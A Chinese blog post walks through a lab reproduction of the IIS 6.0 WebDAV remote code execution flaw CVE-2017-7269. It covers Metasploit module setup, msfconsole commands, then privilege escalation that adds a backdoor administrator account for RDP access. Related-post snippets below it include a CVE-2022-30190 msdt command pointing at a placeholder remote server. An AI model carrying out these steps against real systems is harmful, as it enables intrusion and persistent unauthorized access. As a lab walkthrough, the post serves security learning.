CVE-2017-7269 IIS6.0WebDAV远程代码执行漏洞复现(Window提权)

最新推荐文章于 2024-06-18 09:33:50 发布
最新推荐文章于 2024-06-18 09:33:50 发布
阅读量2.4k 收藏 4
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43886632/article/details/89394590
版权

漏洞说明:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行,目前针对 Windows Server 2003 R2 可以稳定利用,该漏洞最早在2016年7,8月份开始在野外被利用。
影响产品:Microsoft Windows Server 2003 R2 开启WebDAV服务的IIS6.0(目前已验证,其他版本尚未验证)

触发函数:ScStoragePathFromUrl函数

附加信息:ScStoragePathFromUrl函数被调用了两次

漏洞细节:在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞
发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)
漏洞复现
1、环境搭建
window2003 ip 192.168.17.161
攻击者kali ip 192.168.17.205
在window2003上搭建web服务器,并且开启webDAV
在这里插入图片描述2下载攻击模块,上传到/usr/share/metasploit-framework/modules/exploits/windows/iis/
攻击模块下载地址为 https://github.com/zcgonvh/cve-2017-7269
然后开启msf,注意:新版的kali2019不支持,上传后无法启动msf。这里使用的是2018版kali
在这里插入图片描述启动msf,命令msfconsole
在这里插入图片描述使用攻击模块exploit/windows/iis/cve-2017-7269
在这里插入图片描述配置参数
set HttpHost 192.168.17.161
set RHOST 192.168.17.161
开始攻击run
在这里插入图片描述获得shell
在这里插入图片描述普通用户权限
在这里插入图片描述提权上传IIS6.0.exe或者pr.exe巴西烤肉提权,上传到c盘新建的目录hb上
在这里插入图片描述添加tt用户
在这里插入图片描述
将tt用户添加到管理员组
在这里插入图片描述
查看端口,开放了3389远程登录
在这里插入图片描述远程登录
在这里插入图片描述
登录成功
在这里插入图片描述

php00py
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2017-7269远程代码执行漏洞复现
嗷空酒的博客
12-11 1092
cve_2017_7269漏洞属于高危漏洞,是由Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)发现的。IIS 6.0开启Webdav服务的服务器被爆存在缓存区溢出漏洞导致远程代码随意执行,目前针对 Windows Server 2003 R2 可以稳定利用;
CVE-2017-7269iis6.0远程代码执行漏洞复现
热门推荐
Fly_鹏程万里
05-04 1万+
前言趁着有时间,没事干,无聊!所以就拿CVE-2017-7269做一个简单的漏洞复现实战演练!下面就对该漏洞进行简单的简介以及复现漏洞描述漏洞编号:CVE-2017-7269发现人员:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院)漏洞描述:IIS 6.0默认不开启WebDAV,一旦开启了WebDAV支持,安装了IIS6.0的服务器将可能受到该漏洞...
探索网络安全的新边界:修复版MSF模块CVE-2017-7269漏洞利用工具
最新发布
gitblog_00066的博客
06-18 415
探索网络安全的新边界:修复版MSF模块CVE-2017-7269漏洞利用工具 项目地址:https://gitcode.com/zcgonvh/cve-2017-7269 在网络安全的世界里,及时发现和修复漏洞至关重要。今天,我们要向您推介一个针对CVE-2017-7269的修复版Metasploit(MSF)模块,这是一个精心优化的工具,能帮助安全研究人员和管理员更有效地测试和防范Windows...
CVE-2017-7269(远程代码执行漏洞)
Picturej的博客
12-10 327
第一 iis 必须为6.0第二系统windows server2003msf框架使用cve-2017-7269如果没有的话,需要提前导入这个模块msfconsole配置相关信息进来发现权限很低需要进行提权发现了在c盘可以创建文件尝试上传文件来提权拿文件来提权查看当前用户权限,发现提权了。
cve-2017-7269
qfslyy的博客
12-19 2354
CEV-2017-7269(过程,步骤,说明) 1、 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) (只是个人学习笔记) 在github网站下载cve-2017-7269zip包,解压。移动到kali系统中,(kali openvas) 之后需要将包引入到msf中: 可以选择数据库方式,将cve包导入到msf中,也可以直接将包放在目录:/usr/share/metasploit-framework/modules/exploits/w
网络安全2017-7269安全漏洞解析
qq_63060814的博客
04-04 6304
1,使用命令zenmap打开nmap图形化扫描工具,选择配置,点击新的配置或命令 找到模块http-webdav-scan,勾上选用该模块对目标靶机进行扫描 根据扫描结果的信息可以找到靶机的操作系统为Microsoft Windows Server 2003 R2,并且开启WebDAV服务的IIS6.0,初步可以确认该漏洞存在 服务器版本信息: 使用msfconsole命令打开metasploit漏洞测试平台 使用search命令搜索cve-2017-7269 ...
学着分析CVE-2017-7269 -- IIS 6.0 WebDAV远程代码执行漏洞
giantbranch的专栏
04-03 7015
简介 CVE编号:CVE-2017-7269 漏洞级别:严重 漏洞影响:Windows Server 2003 r2 IIS6.0 漏洞发现人:Zhiniang Peng和Chen Wu(华南理工大学信息安全实验室,计算机科学与工程学院) 漏洞类型:缓冲区溢出 实验环境 Windows Server 2003 r2 IIS6.0 procexp
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
03-02
IIS 6.0 WebDAV远程代码执行漏洞利用(CVE-2017-7269)-附件资源
cve-2017-7269-iis6.0环境搭建及复现过程
04-30
cve-2017-7269-iis6.0环境搭建及复现过程 有详细的复现过程。及出错记录
cve-2017-7269-iis6.0 poc metersploit
04-30
cve-2017-7269-iis6.0 的poc 再metersploit中使用,亲测可用。
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
cve-2017-7269.rb
04-11
msfconsole中,webdav漏洞iis服务提权工具。
MSF之IIS6WebDAV执行漏洞复现
极光时流
12-02 1581
MSF之IIS6WebDAV执行漏洞复现准备扫描漏洞 准备 实验准备环境: 靶机:虚拟机win2003 r2位系统,其IP为:10.101.63.150 攻击机:kali系统,其IP为:10.101.17.33 攻击工具:kali自带的msfconsole工具 靶机搭建iis6,可参考:https://jingyan.baidu.com/article/0aa22375bcffb388cc0d6...
iis6.0cve-2017-7269)最完整的利用,从远程利用,到本地提权,再到常见失败原因
redwand的博客
05-04 1252
网上看到的iis6.0cve-2017-7269)的利用文章,要么只有远程利用不包含本地提权,要么包含本地提权却没有常见失败原因,故有此文 本篇文章面向有一点windows命令行基础,kali基础,msf基础的同学
IIS6远程代码执行漏洞复现CVE-2017-7269
17bdw的编程备份笔记
11-16 38
简述 CVE-2017-7269IIS 6.0中存在的一个栈溢出漏洞,在IIS6.0处理PROPFIND指令的时候,由于对url的长度没有进行有效的长度控制和检查,导致执行memcpy对虚拟路径进行构造的时候,引发栈溢出,该漏洞可以导致远程代码执行。 测试环境 受攻击系统:windows server 2003 攻击系统:Kali 2018.04 反弹主机:Ubuntu 18.04 LTS ...
cve-2017-7269环境搭建和漏洞利用
qqqwww_sssd的博客
07-03 567
windows 2003 r2 秘钥:windows 2003 R2 Sp2 64位 企业版MR78C-GF2CY-KC864-DTG74-VMT73windows 2003 R2 Sp2 64位 企业版M6F6D-VFQWH-CGWRB-RC7JR-VCV4Wgithub官网下载地址:GitHub - zcgonvh/cve-2017-7269: fixed msf module for cve-2017-7269个人网盘地址: cve-2017-7269:链接:https://pan.baidu.com
IIS6远程执行漏洞复现
weixin_53696027的博客
03-01 487
通过自己搭建靶场复现IIS远程命令执行漏洞
漏洞复现CVE-2017-12615)
PDblue的博客
03-27 4377
使用https://github.com/vulhub/vulhub/搭建漏洞测试环境 搭建完成后访问http://host:8080 使用burpsuite抓包,修改数据包进行后门文件上传 上传完成后网站返回201 通过浏览器访问后门文件测试是否上传成功 后门文件成功执行命令,说明漏洞利用成功...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行此命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值